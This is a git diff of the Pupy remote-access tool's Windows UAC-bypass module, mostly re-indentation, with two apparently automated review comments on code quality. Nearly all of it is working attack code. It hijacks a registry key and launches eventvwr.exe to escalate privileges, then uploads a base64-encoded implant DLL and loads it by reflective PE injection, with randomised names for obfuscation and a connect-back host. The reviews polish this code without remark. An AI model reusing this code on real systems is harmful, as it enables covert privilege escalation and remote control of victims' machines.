diff --git a/pupy/modules/bypassuac.py b/pupy/modules/bypassuac.py index 01f53676..e6eb1ed2 100644 --- a/pupy/modules/bypassuac.py +++ b/pupy/modules/bypassuac.py 
@@ -20,30 +20,30 @@ class BypassUAC(PupyModule): self.arg_parser.add_argument('-m', dest='method', choices=["eventvwr", "dll_hijacking"], default=None, help="Default: the technic will be choosen for you. 'dll_hijacking' for wind7-8.1 and 'eventvwr' for wind7-10.") def run(self, args): - # check if a UAC Bypass can be done - if not self.client.conn.modules["pupwinutils.security"].can_get_admin_access(): - self.error('Your are not on the local administrator group.') - return + # check if a UAC Bypass can be done + if not self.client.conn.modules["pupwinutils.security"].can_get_admin_access(): + self.error('Your are not on the local administrator group.') + return - dll_hijacking = False - registry_hijacking = False + dll_hijacking = False + registry_hijacking = False - bypassUasModule = bypassuac(self, rootPupyPath=ROOT) - # choose methods depending on the OS Version - if not args.method: - if self.client.desc['release'] == '10': - registry_hijacking = True - else: - dll_hijacking = True - elif args.method == "eventvwr": - registry_hijacking = True - else: - dll_hijacking = True + bypassUasModule = bypassuac(self, rootPupyPath=ROOT) + # choose methods depending on the OS Version + if not args.method: + if self.client.desc['release'] == '10': + registry_hijacking = True + else: + dll_hijacking = True + elif args.method == "eventvwr": + registry_hijacking = True + else: + dll_hijacking = True - if registry_hijacking: - self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...") - bypassUasModule.bypassuac_through_EventVwrBypass() - elif dll_hijacking: - # Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012) - self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...") - bypassUasModule.bypassuac_through_PowerSploitBypassUAC() + if registry_hijacking: + self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 
targets...") + bypassUasModule.bypassuac_through_EventVwrBypass() + elif dll_hijacking: + # Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012) + self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...") + bypassUasModule.bypassuac_through_PowerSploitBypassUAC() diff --git a/pupy/modules/lib/windows/bypassuac.py b/pupy/modules/lib/windows/bypassuac.py index 3ba55cb9..7698725b 100644 --- a/pupy/modules/lib/windows/bypassuac.py +++ b/pupy/modules/lib/windows/bypassuac.py 
@@ -15,122 +15,125 @@ import random, string from pupylib.utils.rpyc_utils import redirected_stdo class bypassuac(): - - def __init__(self, module, rootPupyPath): - self.module = module - self.module.client.load_package("pupwinutils.bypassuac_remote") + + def __init__(self, module, rootPupyPath): + self.module = module + self.module.client.load_package("pupwinutils.bypassuac_remote") - #Remote paths - remoteTempFolder, systemRoot = self.module.client.conn.modules["pupwinutils.bypassuac_remote"].get_env_variables() - - self.invokeReflectivePEInjectionRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt') - self.mainPowershellScriptRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1') - self.pupyDLLRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt') - self.invokeBypassUACRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1') - - #Adding obfuscation on ps1 main function - self.bypassUAC_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7)) - self.reflectivePE_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7)) + #Remote paths + remoteTempFolder, systemRoot = self.module.client.conn.modules["pupwinutils.bypassuac_remote"].get_env_variables() + + self.invokeReflectivePEInjectionRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt') + self.mainPowershellScriptRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1') + self.pupyDLLRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt') + self.invokeBypassUACRemotePath = 
"{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1') + + #Adding obfuscation on ps1 main function + self.bypassUAC_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7)) + self.reflectivePE_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7)) - #Define Local paths - self.pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt') - self.mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt') - self.invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1") - self.invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1") - - - def bypassuac_through_EventVwrBypass(self): - # ''' - # Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/) - # ''' - - # On a Windows 10 "C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe" does not exist, we cannot force to use a x64 bit powershell interpreter - # The pupy dll upload will be a 32 bit - if '64' in self.module.client.desc['proc_arch']: - upload_x86_dll = False - else: - upload_x86_dll = True - self.module.info('Uploading temporary files') - self.uploadPupyDLL(force_x86_dll=upload_x86_dll) - self.uploadPowershellScripts() - files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath] - self.module.info('Altering the registry') - self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking(self.mainPowershellScriptRemotePath, files_to_delete) - - self.module.success("Waiting for a connection from the DLL (take few seconds)...") - - def bypassuac_through_PowerSploitBypassUAC(self): - 
''' - Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1) - ''' - #Constants - bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath) - self.module.info('Uploading temporary files') - self.uploadPowershellScripts() - self.uploadPupyDLL() - content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I) - content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name, content, flags=re.I) - logging.debug("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd)) - self.module.info('Starting the UAC Bypass process') - output = execute_powershell_script(self.module, content, bypassUACcmd, x64IfPossible=True) - logging.debug("BypassUAC script output: %s\n"%(output)) - - if "DLL injection complete!" in output: - self.module.success("UAC bypassed") - else: - self.module.warning("Impossible to know what's happened remotely. You should active debug mode.") - - #Clean tmp files - tmp_files = [self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.invokeBypassUACRemotePath, self.pupyDLLRemotePath] - logging.debug("Deleting temporary files") - self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(tmp_files) - - #... 
- self.module.success("Waiting for a connection from the DLL (take few seconds)...") - - def uploadPowershellScripts(self): - ''' - Upload main powershell script and invokeReflectivePEInjection script - ''' - mainPowerShellScriptPrivileged = """ - cat {invoke_reflective_pe_injection} | Out-String | iex - cat {pupy_dll} | Out-String | iex - {InvokeReflectivePEInjection} -PEBytes $PEBytes -ForceASLR - """.format(invoke_reflective_pe_injection=self.invokeReflectivePEInjectionRemotePath, pupy_dll=self.pupyDLLRemotePath, InvokeReflectivePEInjection=self.reflectivePE_random_name) - - logging.debug("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath)) - with open(self.mainPowerShellScriptPrivilegedLocalPath, 'w+') as w: - w.write(mainPowerShellScriptPrivileged) - - logging.debug("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath)) - content = re.sub("Invoke-ReflectivePEInjection", self.reflectivePE_random_name, open(self.invokeReflectivePEInjectionLocalPath).read(), flags=re.I) - tmp_file = os.path.join(gettempdir(),'reflective_pe.txt') - with open(tmp_file, 'w+') as w: - w.write(content) - upload(self.module.client.conn, tmp_file, self.invokeReflectivePEInjectionRemotePath) - - logging.debug("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath)) - upload(self.module.client.conn, self.mainPowerShellScriptPrivilegedLocalPath, self.mainPowershellScriptRemotePath) + #Define Local paths + self.pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt') + self.mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt') + self.invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1") + self.invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", 
"Invoke-BypassUAC.ps1") + + + def bypassuac_through_EventVwrBypass(self): + # ''' + # Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/) + # ''' + + # On a Windows 10 "C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe" does not exist, we cannot force to use a x64 bit powershell interpreter + # The pupy dll upload will be a 32 bit + print repr(self.module.client.desc) + if '64' in self.module.client.desc['proc_arch']: + upload_x86_dll = False + else: + upload_x86_dll = True + self.module.info('Uploading temporary files') + self.uploadPupyDLL(force_x86_dll=upload_x86_dll) + self.uploadPowershellScripts() + files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath] + self.module.info('Altering the registry') + self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking(self.mainPowershellScriptRemotePath, files_to_delete) + + self.module.success("Waiting for a connection from the DLL (take few seconds)...") + self.module.success("If nothing happened, try to migrate to another process and try again.") + + def bypassuac_through_PowerSploitBypassUAC(self): + ''' + Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1) + ''' + #Constants + bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath) + self.module.info('Uploading temporary files') + self.uploadPowershellScripts() + self.uploadPupyDLL() + content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I) + content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name, content, flags=re.I) + logging.debug("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd)) 
+ self.module.info('Starting the UAC Bypass process') + output = execute_powershell_script(self.module, content, bypassUACcmd, x64IfPossible=True) + logging.debug("BypassUAC script output: %s\n"%(output)) + + if "DLL injection complete!" in output: + self.module.success("UAC bypassed") + else: + self.module.warning("Impossible to know what's happened remotely. You should active debug mode.") + + #Clean tmp files + tmp_files = [self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.invokeBypassUACRemotePath, self.pupyDLLRemotePath] + logging.debug("Deleting temporary files") + self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(tmp_files) + + #... + self.module.success("Waiting for a connection from the DLL (take few seconds)...") + self.module.success("If nothing happened, try to migrate to another process and try again.") + + def uploadPowershellScripts(self): + ''' + Upload main powershell script and invokeReflectivePEInjection script + ''' + mainPowerShellScriptPrivileged = """ + cat {invoke_reflective_pe_injection} | Out-String | iex + cat {pupy_dll} | Out-String | iex + {InvokeReflectivePEInjection} -PEBytes $PEBytes -ForceASLR + """.format(invoke_reflective_pe_injection=self.invokeReflectivePEInjectionRemotePath, pupy_dll=self.pupyDLLRemotePath, InvokeReflectivePEInjection=self.reflectivePE_random_name) + + logging.debug("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath)) + with open(self.mainPowerShellScriptPrivilegedLocalPath, 'w+') as w: + w.write(mainPowerShellScriptPrivileged) + + logging.debug("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath)) + content = re.sub("Invoke-ReflectivePEInjection", self.reflectivePE_random_name, open(self.invokeReflectivePEInjectionLocalPath).read(), flags=re.I) + tmp_file = os.path.join(gettempdir(),'reflective_pe.txt') + with open(tmp_file, 'w+') as w: + 
w.write(content) + upload(self.module.client.conn, tmp_file, self.invokeReflectivePEInjectionRemotePath) + + logging.debug("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath)) + upload(self.module.client.conn, self.mainPowerShellScriptPrivilegedLocalPath, self.mainPowershellScriptRemotePath) - def uploadPupyDLL(self, force_x86_dll=False): - ''' - Upload pupy dll as a txt file - ''' - res=self.module.client.conn.modules['pupy'].get_connect_back_host() - host, port = res.rsplit(':',1) - logging.debug("Address configured is %s:%s for pupy dll..."%(host,port)) - logging.debug("Looking for process architecture...") + def uploadPupyDLL(self, force_x86_dll=False): + ''' + Upload pupy dll as a txt file + ''' + res=self.module.client.conn.modules['pupy'].get_connect_back_host() + host, port = res.rsplit(':',1) + logging.debug("Address configured is %s:%s for pupy dll..."%(host,port)) + logging.debug("Looking for process architecture...") - if "64" in self.module.client.desc["os_arch"] and not force_x86_dll: - logging.debug("Target achitecture is x64, using a x64 dll") - dllbuff=pupygen.get_edit_pupyx64_dll(self.module.client.get_conf()) - else: - logging.debug("Target achitecture is x86, using a x86 dll") - dllbuff=pupygen.get_edit_pupyx86_dll(self.module.client.get_conf()) - - logging.debug("Creating the pupy dll in %s locally"%(self.pupyDLLLocalPath)) - with open(self.pupyDLLLocalPath, 'w+') as w: - w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff))) - - logging.debug("Uploading pupy dll in {0}".format(self.pupyDLLRemotePath)) - upload(self.module.client.conn, self.pupyDLLLocalPath, self.pupyDLLRemotePath) + if "64" in self.module.client.desc["os_arch"] and not force_x86_dll: + logging.debug("Target achitecture is x64, using a x64 dll") + dllbuff=pupygen.get_edit_pupyx64_dll(self.module.client.get_conf()) + else: + logging.debug("Target achitecture is x86, using a x86 dll") + 
dllbuff=pupygen.get_edit_pupyx86_dll(self.module.client.get_conf()) + + logging.debug("Creating the pupy dll in %s locally"%(self.pupyDLLLocalPath)) + with open(self.pupyDLLLocalPath, 'w+') as w: + w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff))) + + logging.debug("Uploading pupy dll in {0}".format(self.pupyDLLRemotePath)) + upload(self.module.client.conn, self.pupyDLLLocalPath, self.pupyDLLRemotePath) diff --git a/pupy/packages/windows/all/pupwinutils/bypassuac_remote.py b/pupy/packages/windows/all/pupwinutils/bypassuac_remote.py index 71e0f051..56ce6f58 100644 --- a/pupy/packages/windows/all/pupwinutils/bypassuac_remote.py +++ b/pupy/packages/windows/all/pupwinutils/bypassuac_remote.py 
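Review bot: The added `print repr(self.module.client.desc)` in bypassuac_through_EventVwrBypass looks like a leftover debugging statement: it dumps the whole client descriptor to the controller's stdout, bypassing the `self.module.info` / `logging.debug` channels every other line of this class uses. Either drop it or make it `logging.debug("client desc: %r", self.module.client.desc)` so it follows the configured verbosity. Apart from that line and the two new "If nothing happened..." success messages, this hunk is a re-indentation, so the pre-existing `open(...).read()` calls without a context manager in uploadPowershellScripts and bypassuac_through_PowerSploitBypassUAC, and the fixed-name scratch files written with `'w+'` into gettempdir() (`dllFile.txt`, `reflective_pe.txt`, `mainPowerShellScriptPrivileged.txt`), are carried over unchanged; a `tempfile.NamedTemporaryFile`-style unique name would avoid clobbering or being clobbered by another user of the same temp directory on the operator host.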
@@ -4,51 +4,51 @@ import subprocess from _winreg import * def deleteTHisRemoteFile(tmp_files): - for file in tmp_files: - try: - os.remove(file) - except Exception, e: - pass + for file in tmp_files: + try: + os.remove(file) + except Exception, e: + pass def get_env_variables(): - try: - tmp = os.path.expandvars("%TEMP%") - except: - tmp = os.path.expandvars("%APPDATA%") - - sysroot = os.path.expandvars("%SYSTEMROOT%") - - return tmp, sysroot + try: + tmp = os.path.expandvars("%TEMP%") + except: + tmp = os.path.expandvars("%APPDATA%") + + sysroot = os.path.expandvars("%SYSTEMROOT%") + + return tmp, sysroot def registry_hijacking(mainPowershellScriptRemotePath, files_to_delete): - # ''' - # Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/) - # ''' - HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) - powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % os.path.expandvars("%SYSTEMROOT%") - mscCmdPath = "Software\Classes\mscfile\shell\open\command" - cmd = "{1} -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath, powershellPath) - - try: - # The registry key already exist in HKCU, altering... - key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE) - except: - # Adding the registry key in HKCU - key = CreateKey(HKCU, mscCmdPath) + # ''' + # Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/) + # ''' + HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) + powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % os.path.expandvars("%SYSTEMROOT%") + mscCmdPath = "Software\Classes\mscfile\shell\open\command" + cmd = "{1} -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath, powershellPath) + + try: + # The registry key already exist in HKCU, altering... 
+ key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE) + except: + # Adding the registry key in HKCU + key = CreateKey(HKCU, mscCmdPath) - registry_key = OpenKey(HKCU, mscCmdPath, 0, KEY_WRITE) - SetValueEx(registry_key, '', 0, REG_SZ, cmd) - CloseKey(registry_key) - - # Executing eventvwr.exe - eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe') - output = subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True) + registry_key = OpenKey(HKCU, mscCmdPath, 0, KEY_WRITE) + SetValueEx(registry_key, '', 0, REG_SZ, cmd) + CloseKey(registry_key) + + # Executing eventvwr.exe + eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe') + output = subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True) - # Sleeping 5 secds... - time.sleep(5) - - #Clean everything - DeleteKey(HKCU, mscCmdPath) - deleteTHisRemoteFile(files_to_delete) - \ No newline at end of file + # Sleeping 5 secds... + time.sleep(5) + + #Clean everything + DeleteKey(HKCU, mscCmdPath) + deleteTHisRemoteFile(files_to_delete) +
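Review bot: In registry_hijacking the handle `key` returned by OpenKey/CreateKey is never closed — the function immediately reopens the same path as `registry_key` and only closes that one, so the first handle leaks for the life of the interpreter. The bare `except:` around OpenKey also swallows everything, not just the missing-key case, so a permissions or connection error would surface later as a confusing failure in CreateKey or SetValueEx; `except WindowsError:` keeps the intent (key absent → create it) while leaving other errors visible. A minimal fix is `CloseKey(key)` right after the try/except, or using `key` for SetValueEx instead of reopening the path. The rest of the hunk is re-indentation plus the added final newline; deleteTHisRemoteFile and get_env_variables keep their existing bare/broad excepts unchanged.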